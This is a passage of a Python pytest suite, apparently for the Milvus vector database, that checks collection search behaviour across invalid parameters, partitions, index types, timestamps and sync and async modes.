deleted_par_name = par[partition_num].name
collection_w.drop_partition(deleted_par_name)
log.info("test_search_partition_deleted: deleted a partition")
collection_w.load()
# 3. search after delete partitions
log.info("test_search_partition_deleted: searching deleted partition")
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit, default_search_exp,
[deleted_par_name],
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "PartitonName: %s not found" % deleted_par_name})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.xfail(reason="issue 6731")
@pytest.mark.parametrize("index, params",
zip(ct.all_index_types[:9],
ct.default_index_params[:9]))
def test_search_different_index_invalid_params(self, index, params):
"""
        target: test search with different indexes when the default index params are invalid
        method: adjust the invalid params, create the index, then search
        expected: search successfully
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, 5000,
partition_num=1,
is_index=True)[0:4]
# 2. create different index
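        # for PQ-family indexes the sub-quantizer count m must divide dim evenly; fall back to dim // 4 when the default value does not (assumed PQ parameter constraint)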
if params.get("m"):
if (default_dim % params["m"]) != 0:
params["m"] = default_dim // 4
log.info("test_search_different_index_invalid_params: Creating index-%s" % index)
default_index = {"index_type": index, "params": params, "metric_type": "L2"}
collection_w.create_index("float_vector", default_index)
log.info("test_search_different_index_invalid_params: Created index-%s" % index)
collection_w.load()
# 3. search
log.info("test_search_different_index_invalid_params: Searching after creating index-%s" % index)
collection_w.search(vectors, default_search_field,
default_search_params, default_limit,
default_search_exp,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": default_limit})
@pytest.mark.tags(CaseLabel.L1)
def test_search_index_partition_not_existed(self):
"""
        target: test search in a non-existent partition
        method: search with a non-existent partition name
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix, True)[0]
# 2. create index
default_index = {"index_type": "IVF_FLAT", "params": {"nlist": 128}, "metric_type": "L2"}
collection_w.create_index("float_vector", default_index)
# 3. search the non exist partition
partition_name = "search_non_exist"
collection_w.search(vectors[:default_nq], default_search_field, default_search_params,
default_limit, default_search_exp, [partition_name],
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "PartitonName: %s not found" % partition_name})
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_invalid_binary(self):
"""
        target: test search on binary data with an invalid parameter
method: search with wrong metric type
expected: raise exception and report the error
"""
# 1. initialize with binary data
collection_w = self.init_collection_general(prefix, True, is_binary=True)[0]
# 2. create index
default_index = {"index_type": "BIN_IVF_FLAT", "params": {"nlist": 128}, "metric_type": "JACCARD"}
collection_w.create_index("binary_vector", default_index)
# 3. search with exception
binary_vectors = cf.gen_binary_vectors(3000, default_dim)[1]
wrong_search_params = {"metric_type": "L2", "params": {"nprobe": 10}}
collection_w.search(binary_vectors[:default_nq], "binary_vector", wrong_search_params,
default_limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "unsupported"})
@pytest.mark.tags(CaseLabel.L2)
def test_search_binary_flat_with_L2(self):
"""
        target: search binary collection using FLAT with L2
method: search binary collection using FLAT with L2
expected: raise exception and report error
"""
# 1. initialize with binary data
collection_w = self.init_collection_general(prefix, True, is_binary=True)[0]
# 2. search and assert
query_raw_vector, binary_vectors = cf.gen_binary_vectors(2, default_dim)
search_params = {"metric_type": "L2", "params": {"nprobe": 10}}
collection_w.search(binary_vectors[:default_nq], "binary_vector",
search_params, default_limit, "int64 >= 0",
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "Search failed"})
@pytest.mark.tags(CaseLabel.L1)
def test_search_with_output_fields_not_exist(self):
"""
target: test search with output fields
method: search with non-exist output_field
expected: raise exception
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True)[0:4]
# 2. search
log.info("test_search_with_output_fields_not_exist: Searching collection %s" % collection_w.name)
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit,
default_search_exp, output_fields=["int63"],
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1,
ct.err_msg: "Field int63 not exist"})
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("output_fields", [[default_search_field], ["%"]])
def test_search_output_field_vector(self, output_fields):
"""
target: test search with vector as output field
method: search with one vector output_field or
wildcard for vector
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix, True)[0]
# 2. search
log.info("test_search_output_field_vector: Searching collection %s" % collection_w.name)
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit,
default_search_exp, output_fields=output_fields,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "Search doesn't support "
"vector field as output_fields"})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("output_fields", [["*%"], ["**"], ["*", "@"]])
def test_search_output_field_invalid_wildcard(self, output_fields):
"""
target: test search with invalid output wildcard
method: search with invalid output_field wildcard
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix, True)[0]
# 2. search
log.info("test_search_output_field_invalid_wildcard: Searching collection %s" % collection_w.name)
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit,
default_search_exp, output_fields=output_fields,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": f"Field {output_fields[-1]} not exist"})
@pytest.mark.tags(CaseLabel.L2)
def test_search_param_invalid_travel_timestamp(self, get_invalid_travel_timestamp):
"""
target: test search with invalid travel timestamp
method: search with invalid travel timestamp
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix, True, 10)[0]
# 2. search with invalid travel timestamp
log.info("test_search_param_invalid_travel_timestamp: searching with invalid travel timestamp")
invalid_travel_time = get_invalid_travel_timestamp
collection_w.search(vectors[:default_nq], default_search_field, default_search_params,
default_limit, default_search_exp,
travel_timestamp=invalid_travel_time,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "`travel_timestamp` value %s is illegal" % invalid_travel_time})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.skip(reason="issue 11985")
def test_search_param_invalid_guarantee_timestamp(self, get_invalid_guarantee_timestamp):
"""
target: test search with invalid guarantee timestamp
method: search with invalid guarantee timestamp
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix, True, 10)[0]
# 2. search with invalid travel timestamp
log.info("test_search_param_invalid_guarantee_timestamp: searching with invalid guarantee timestamp")
invalid_guarantee_time = get_invalid_guarantee_timestamp
collection_w.search(vectors[:default_nq], default_search_field, default_search_params,
default_limit, default_search_exp,
guarantee_timestamp=invalid_guarantee_time,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "`guarantee_timestamp` value %s is illegal"
% invalid_guarantee_time})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("round_decimal", [7, -2, 999, 1.0, None, [1], "string", {}])
def test_search_invalid_round_decimal(self, round_decimal):
"""
target: test search with invalid round decimal
method: search with invalid round decimal
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix, True, nb=10)[0]
# 2. search
log.info("test_search_invalid_round_decimal: Searching collection %s" % collection_w.name)
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit,
default_search_exp, round_decimal=round_decimal,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": f"`round_decimal` value {round_decimal} is illegal"})
class TestCollectionSearch(TestcaseBase):
""" Test case of search interface """
@pytest.fixture(scope="function",
params=[default_nb, default_nb_medium])
def nb(self, request):
yield request.param
@pytest.fixture(scope="function", params=[2, 500])
def nq(self, request):
yield request.param
@pytest.fixture(scope="function", params=[8, 128])
def dim(self, request):
yield request.param
@pytest.fixture(scope="function", params=[False, True])
def auto_id(self, request):
yield request.param
@pytest.fixture(scope="function", params=[False, True])
def _async(self, request):
yield request.param
"""
******************************************************************
# The following are valid base cases
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_search_normal(self, nq, dim, auto_id):
"""
target: test search normal case
method: create connection, collection, insert and search
        expected: 1. search returns 0 results with a travel timestamp before the insert
                  2. search returns limit(topK) results with a travel timestamp at or after the insert
"""
# 1. initialize with data
collection_w, _, _, insert_ids, time_stamp = \
self.init_collection_general(prefix, True, auto_id=auto_id, dim=dim)[0:5]
# 2. search before insert time_stamp
log.info("test_search_normal: searching collection %s" % collection_w.name)
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp,
travel_timestamp=time_stamp - 1,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": [],
"limit": 0})
# 3. search after insert time_stamp
collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp,
travel_timestamp=time_stamp,
guarantee_timestamp=0,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit})
    @pytest.mark.tags(CaseLabel.L0)
def test_search_with_hit_vectors(self, nq, dim, auto_id):
"""
target: test search with vectors in collections
        method: create connection and collection, insert vectors and search for them
expected: search successfully with limit(topK) and can be hit at top 1 (min distance is 0)
"""
collection_w, _vectors, _, insert_ids = \
self.init_collection_general(prefix, True, auto_id=auto_id, dim=dim)[0:4]
# get vectors that inserted into collection
vectors = np.array(_vectors[0]).tolist()
vectors = [vectors[i][-1] for i in range(nq)]
log.info("test_search_with_hit_vectors: searching collection %s" % collection_w.name)
search_res, _ = collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit})
log.info("test_search_with_hit_vectors: checking the distance of top 1")
for hits in search_res:
            # verify that the top 1 hit is the query vector itself, so the min distance is 0
assert hits.distances[0] == 0.0
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("dup_times", [1,2,3])
def test_search_with_dup_primary_key(self, dim, auto_id, _async, dup_times):
"""
target: test search with duplicate primary key
method: 1.insert same data twice
2.search
expected: search results are de-duplicated
"""
# initialize with data
nb = ct.default_nb
nq = ct.default_nq
collection_w, insert_data, _, insert_ids = self.init_collection_general(prefix, True, nb,
auto_id=auto_id,
dim=dim)[0:4]
# insert dup data multi times
for i in range(dup_times):
insert_res, _ = collection_w.insert(insert_data[0])
insert_ids.extend(insert_res.primary_keys)
# search
vectors = [[random.random() for _ in range(dim)] for _ in range(default_nq)]
search_res, _ = collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
if _async:
search_res.done()
search_res = search_res.result()
# assert that search results are de-duplicated
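        # comparing the sorted de-duplicated ids with the sorted raw ids catches any primary key repeated within a single hit list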
for hits in search_res:
ids = hits.ids
assert sorted(list(set(ids))) == sorted(ids)
@pytest.mark.tags(CaseLabel.L1)
def test_search_with_empty_vectors(self, dim, auto_id, _async):
"""
target: test search with empty query vector
method: search using empty query vector
expected: search successfully with 0 results
"""
# 1. initialize without data
collection_w = self.init_collection_general(prefix, True,
auto_id=auto_id, dim=dim)[0]
# 2. search collection without data
log.info("test_search_with_empty_vectors: Searching collection %s "
"using empty vector" % collection_w.name)
collection_w.search([], default_search_field, default_search_params,
default_limit, default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": 0,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_with_ndarray(self, dim, auto_id, _async):
"""
target: test search with ndarray
method: search using ndarray data
expected: search successfully
"""
# 1. initialize without data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True,
auto_id=auto_id,
dim=dim)[0:4]
# 2. search collection without data
log.info("test_search_with_ndarray: Searching collection %s "
"using ndarray" % collection_w.name)
vectors = np.random.randn(default_nq, dim)
collection_w.search(vectors, default_search_field, default_search_params,
default_limit, default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("search_params", [{}, {"params": {}}, {"params": {"nprobe": 10}}])
def test_search_normal_default_params(self, dim, auto_id, search_params, _async):
"""
target: test search normal case
method: create connection, collection, insert and search
expected: search successfully with limit(topK)
"""
# 1. initialize with data
collection_w, _, _, insert_ids = \
self.init_collection_general(prefix, True, auto_id=auto_id, dim=dim)[0:4]
# 2. search
log.info("test_search_normal_default_params: searching collection %s" % collection_w.name)
vectors = [[random.random() for _ in range(dim)] for _ in range(default_nq)]
collection_w.search(vectors[:default_nq], default_search_field,
search_params, default_limit,
default_search_exp, _async=_async,
travel_timestamp=0,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
@pytest.mark.tags(CaseLabel.L1)
def test_search_before_after_delete(self, nq, dim, auto_id, _async):
"""
target: test search function before and after deletion
method: 1. search the collection
2. delete a partition
3. search the collection
expected: the deleted entities should not be searched
"""
# 1. initialize with data
nb = 1000
limit = 1000
partition_num = 1
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
partition_num,
auto_id=auto_id,
dim=dim)[0:4]
# 2. search all the partitions before partition deletion
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
log.info("test_search_before_after_delete: searching before deleting partitions")
collection_w.search(vectors[:nq], default_search_field,
default_search_params, limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": limit,
"_async": _async})
# 3. delete partitions
log.info("test_search_before_after_delete: deleting a partition")
par = collection_w.partitions
deleted_entity_num = par[partition_num].num_entities
entity_num = nb - deleted_entity_num
collection_w.drop_partition(par[partition_num].name)
log.info("test_search_before_after_delete: deleted a partition")
collection_w.load()
# 4. search non-deleted part after delete partitions
log.info("test_search_before_after_delete: searching after deleting partitions")
collection_w.search(vectors[:nq], default_search_field,
default_search_params, limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids[:entity_num],
"limit": limit - deleted_entity_num,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_partition_after_release_one(self, nq, dim, auto_id, _async):
"""
target: test search function before and after release
method: 1. search the collection
2. release a partition
3. search the collection
        expected: entities in the released partition should not be returned
"""
# 1. initialize with data
nb = 1000
limit = 1000
partition_num = 1
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
partition_num,
auto_id=auto_id,
dim=dim)[0:4]
# 2. search all the partitions before partition deletion
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
log.info("test_search_partition_after_release_one: searching before deleting partitions")
collection_w.search(vectors[:nq], default_search_field,
default_search_params, limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": limit,
"_async": _async})
# 3. release one partition
log.info("test_search_partition_after_release_one: releasing a partition")
par = collection_w.partitions
deleted_entity_num = par[partition_num].num_entities
entity_num = nb - deleted_entity_num
conn = self.connection_wrap.get_connection()[0]
conn.release_partitions(collection_w.name, [par[partition_num].name])
log.info("test_search_partition_after_release_one: released a partition")
# 4. search collection after release one partition
log.info("test_search_partition_after_release_one: searching after deleting partitions")
collection_w.search(vectors[:nq], default_search_field,
default_search_params, limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids[:entity_num],
"limit": limit - deleted_entity_num,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_partition_after_release_all(self, nq, dim, auto_id, _async):
"""
target: test search function before and after release
method: 1. search the collection
2. release all partitions
3. search the collection
        expected: 0 entities should be returned
"""
# 1. initialize with data
nb = 1000
limit = 1000
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
1, auto_id=auto_id,
dim=dim)[0:4]
# 2. search all the partitions before partition deletion
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
log.info("test_search_partition_after_release_all: searching before deleting partitions")
collection_w.search(vectors[:nq], default_search_field,
default_search_params, limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": limit,
"_async": _async})
# 3. release all partitions
log.info("test_search_partition_after_release_all: releasing a partition")
par = collection_w.partitions
conn = self.connection_wrap.get_connection()[0]
conn.release_partitions(collection_w.name, [par[0].name, par[1].name])
log.info("test_search_partition_after_release_all: released a partition")
# 4. search collection after release all partitions
collection_w.search(vectors[:nq], default_search_field,
default_search_params, limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": [],
"limit": 0,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_collection_after_release_load(self, nb, nq, dim, auto_id, _async):
"""
target: search the pre-released collection after load
method: 1. create collection
2. release collection
3. load collection
4. search the pre-released collection
expected: search successfully
"""
# 1. initialize without data
collection_w, _, _, insert_ids, time_stamp = self.init_collection_general(prefix, True, nb,
1, auto_id=auto_id,
dim=dim)[0:5]
# 2. release collection
log.info("test_search_collection_after_release_load: releasing collection %s" % collection_w.name)
collection_w.release()
log.info("test_search_collection_after_release_load: released collection %s" % collection_w.name)
# 3. Search the pre-released collection after load
log.info("test_search_collection_after_release_load: loading collection %s" % collection_w.name)
collection_w.load()
log.info("test_search_collection_after_release_load: searching after load")
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
collection_w.search(vectors[:nq], default_search_field, default_search_params,
default_limit, default_search_exp, _async=_async,
travel_timestamp=time_stamp,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.xfail(reason="issue 6997")
def test_search_partition_after_release_load(self, nb, nq, dim, auto_id, _async):
"""
target: search the pre-released collection after load
method: 1. create collection
2. release a partition
3. load partition
4. search the pre-released partition
expected: search successfully
"""
# 1. initialize without data
collection_w, _, _, insert_ids, time_stamp = self.init_collection_general(prefix, True, nb,
1, auto_id=auto_id,
dim=dim)[0:5]
# 2. release collection
log.info("test_search_partition_after_release_load: releasing a partition")
par = collection_w.partitions
conn = self.connection_wrap.get_connection()[0]
conn.release_partitions(collection_w.name, [par[1].name])
log.info("test_search_partition_after_release_load: released a partition")
# 3. Search the collection after load
limit = 1000
collection_w.load()
log.info("test_search_partition_after_release_load: searching after load")
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
collection_w.search(vectors[:nq], default_search_field, default_search_params,
limit, default_search_exp, _async=_async,
travel_timestamp=time_stamp,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": limit,
"_async": _async})
# 4. Search the pre-released partition after load
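        # cap the expected hit count at the partition's own entity count when limit exceeds it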
if limit > par[1].num_entities:
limit_check = par[1].num_entities
else:
limit_check = limit
collection_w.search(vectors[:nq], default_search_field, default_search_params,
limit, default_search_exp,
[par[1].name], _async=_async,
travel_timestamp=time_stamp,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids[par[0].num_entities:],
"limit": limit_check,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_load_flush_load(self, nb, nq, dim, auto_id, _async):
"""
target: test search when load before flush
method: 1. insert data and load
2. flush, and load
3. search the collection
expected: search success with limit(topK)
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix, auto_id=auto_id, dim=dim)[0]
# 2. insert data
insert_ids = cf.insert_data(collection_w, nb, auto_id=auto_id, dim=dim)[3]
# 3. load data
collection_w.load()
# 4. flush and load
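        # accessing num_entities is what triggers the flush referred to in the step comment above (assumed behaviour of the ORM wrapper used by these tests)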
collection_w.num_entities
collection_w.load()
# 5. search
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_new_data(self, nq, dim, auto_id, _async):
"""
target: test search new inserted data without load
method: 1. search the collection
2. insert new data
3. search the collection without load again
4. Use guarantee_timestamp to guarantee data consistency
expected: new data should be searched
"""
# 1. initialize with data
limit = 1000
nb_old = 500
collection_w, _, _, insert_ids, time_stamp = self.init_collection_general(prefix, True, nb_old,
auto_id=auto_id,
dim=dim)[0:5]
# 2. search for original data after load
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
log.info("test_search_new_data: searching for original data after load")
collection_w.search(vectors[:nq], default_search_field,
default_search_params, limit,
default_search_exp, _async=_async,
travel_timestamp=time_stamp + 1,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": nb_old,
"_async": _async})
# 3. insert new data
nb_new = 300
_, _, _, insert_ids_new, time_stamp = cf.insert_data(collection_w, nb_new,
auto_id=auto_id, dim=dim,
insert_offset=nb_old)
insert_ids.extend(insert_ids_new)
# 4. search for new data without load
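        # guarantee_timestamp is assumed to make the query wait until data up to that timestamp is visible, so the newly inserted rows can be found without an explicit flush or reload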
collection_w.search(vectors[:nq], default_search_field,
default_search_params, limit,
default_search_exp, _async=_async,
guarantee_timestamp=time_stamp,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": nb_old + nb_new,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.skip(reason="debug")
def test_search_max_dim(self, auto_id, _async):
"""
target: test search with max configuration
method: create connection, collection, insert and search with max dim
expected: search successfully with limit(topK)
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, 100,
auto_id=auto_id,
dim=max_dim)[0:4]
# 2. search
nq = 2
log.info("test_search_max_dim: searching collection %s" % collection_w.name)
vectors = [[random.random() for _ in range(max_dim)] for _ in range(nq)]
collection_w.search(vectors[:nq], default_search_field,
default_search_params, nq,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": nq,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("index, params",
zip(ct.all_index_types[:9],
ct.default_index_params[:9]))
def test_search_after_different_index_with_params(self, dim, index, params, auto_id, _async):
"""
target: test search after different index
method: test search after different index and corresponding search params
expected: search successfully with limit(topK)
"""
# 1. initialize with data
collection_w, _, _, insert_ids, time_stamp = self.init_collection_general(prefix, True, 5000,
partition_num=1,
auto_id=auto_id,
dim=dim, is_index=True)[0:5]
# 2. create index and load
if params.get("m"):
if (dim % params["m"]) != 0:
params["m"] = dim // 4
if params.get("PQM"):
if (dim % params["PQM"]) != 0:
params["PQM"] = dim // 4
default_index = {"index_type": index, "params": params, "metric_type": "L2"}
collection_w.create_index("float_vector", default_index)
collection_w.load()
# 3. search
search_params = cf.gen_search_param(index)
vectors = [[random.random() for _ in range(dim)] for _ in range(default_nq)]
for search_param in search_params:
log.info("Searching with search params: {}".format(search_param))
collection_w.search(vectors[:default_nq], default_search_field,
search_param, default_limit,
default_search_exp, _async=_async,
travel_timestamp=time_stamp,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("index, params",
zip(ct.all_index_types[:9],
ct.default_index_params[:9]))
def test_search_after_index_different_metric_type(self, dim, index, params, auto_id, _async):
"""
target: test search with different metric type
method: test search with different metric type
expected: searched successfully
"""
# 1. initialize with data
collection_w, _, _, insert_ids, time_stamp = self.init_collection_general(prefix, True, 5000,
partition_num=1,
auto_id=auto_id,
dim=dim, is_index=True)[0:5]
# 2. create different index
if params.get("m"):
if (dim % params["m"]) != 0:
params["m"] = dim // 4
if params.get("PQM"):
if (dim % params["PQM"]) != 0:
params["PQM"] = dim // 4
log.info("test_search_after_index_different_metric_type: Creating index-%s" % index)
default_index = {"index_type": index, "params": params, "metric_type": "IP"}
collection_w.create_index("float_vector", default_index)
log.info("test_search_after_index_different_metric_type: Created index-%s" % index)
collection_w.load()
# 3. search
search_params = cf.gen_search_param(index, "IP")
vectors = [[random.random() for _ in range(dim)] for _ in range(default_nq)]
for search_param in search_params:
log.info("Searching with search params: {}".format(search_param))
collection_w.search(vectors[:default_nq], default_search_field,
search_param, default_limit,
default_search_exp, _async=_async,
travel_timestamp=time_stamp,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_collection_multiple_times(self, nb, nq, dim, auto_id, _async):
"""
target: test search for multiple times
method: search for multiple times
expected: searched successfully
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
auto_id=auto_id,
dim=dim)[0:4]
# 2. search for multiple times
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
for i in range(search_num):
log.info("test_search_collection_multiple_times: searching round %d" % (i + 1))
collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_sync_async_multiple_times(self, nb, nq, dim, auto_id):
"""
target: test async search after sync search case
method: create connection, collection, insert,
sync search and async search
expected: search successfully with limit(topK)
"""
# 1. initialize with data
collection_w, _, _, insert_ids, time_stamp = self.init_collection_general(prefix, True, nb,
auto_id=auto_id,
dim=dim)[0:5]
# 2. search
log.info("test_search_sync_async_multiple_times: searching collection %s" % collection_w.name)
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
for i in range(search_num):
log.info("test_search_sync_async_multiple_times: searching round %d" % (i + 1))
for _async in [False, True]:
collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
travel_timestamp=time_stamp,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_multiple_vectors(self, nb, nq, dim, auto_id, _async):
"""
target: test search with multiple vectors
method: create connection, collection with multiple
vectors, insert and search
expected: search successfully with limit(topK)
"""
# 1. connect
self._connect()
# 2. create collection with multiple vectors
c_name = cf.gen_unique_str(prefix)
fields = [cf.gen_int64_field(is_primary=True), cf.gen_float_field(),
cf.gen_float_vec_field(dim=dim), cf.gen_float_vec_field(name="tmp", dim=dim)]
schema = cf.gen_collection_schema(fields=fields, auto_id=auto_id)
collection_w = self.collection_wrap.init_collection(c_name, schema=schema,
check_task=CheckTasks.check_collection_property,
check_items={"name": c_name, "schema": schema})[0]
# 3. insert
vectors = [[random.random() for _ in range(dim)] for _ in range(nb)]
vectors_tmp = [[random.random() for _ in range(dim)] for _ in range(nb)]
data = [[i for i in range(nb)], [np.float32(i) for i in range(nb)], vectors, vectors_tmp]
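        # when auto_id is enabled the primary-key column must not be supplied, so drop the int64 column from the insert data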
if auto_id:
data = [[np.float32(i) for i in range(nb)], vectors, vectors_tmp]
res = collection_w.insert(data)
insert_ids = res.primary_keys
assert collection_w.num_entities == nb
# 4. load
collection_w.load()
# 5. search all the vectors
log.info("test_search_multiple_vectors: searching collection %s" % collection_w.name)
collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
collection_w.search(vectors[:nq], "tmp",
default_search_params, default_limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
@pytest.mark.tags(CaseLabel.L1)
def test_search_index_one_partition(self, nb, auto_id, _async):
"""
target: test search from partition
method: search from one partition
expected: searched successfully
"""
# 1. initialize with data
collection_w, _, _, insert_ids, time_stamp = self.init_collection_general(prefix, True, nb,
partition_num=1,
auto_id=auto_id,
is_index=True)[0:5]
# 2. create index
default_index = {"index_type": "IVF_FLAT", "params": {"nlist": 128}, "metric_type": "L2"}
collection_w.create_index("float_vector", default_index)
collection_w.load()
# 3. search in one partition
log.info("test_search_index_one_partition: searching (1000 entities) through one partition")
limit = 1000
par = collection_w.partitions
if limit > par[1].num_entities:
limit_check = par[1].num_entities
else:
limit_check = limit
search_params = {"metric_type": "L2", "params": {"nprobe": 128}}
collection_w.search(vectors[:default_nq], default_search_field,
search_params, limit, default_search_exp,
[par[1].name], _async=_async,
travel_timestamp=time_stamp,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids[par[0].num_entities:],
"limit": limit_check,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_index_partitions(self, nb, nq, dim, auto_id, _async):
"""
target: test search from partitions
method: search from partitions
expected: searched successfully
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
partition_num=1,
auto_id=auto_id,
dim=dim,
is_index=True)[0:4]
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
# 2. create index
default_index = {"index_type": "IVF_FLAT", "params": {"nlist": 128}, "metric_type": "L2"}
collection_w.create_index("float_vector", default_index)
collection_w.load()
# 3. search through partitions
log.info("test_search_index_partitions: searching (1000 entities) through partitions")
par = collection_w.partitions
log.info("test_search_index_partitions: partitions: %s" % par)
limit = 1000
collection_w.search(vectors[:nq], default_search_field,
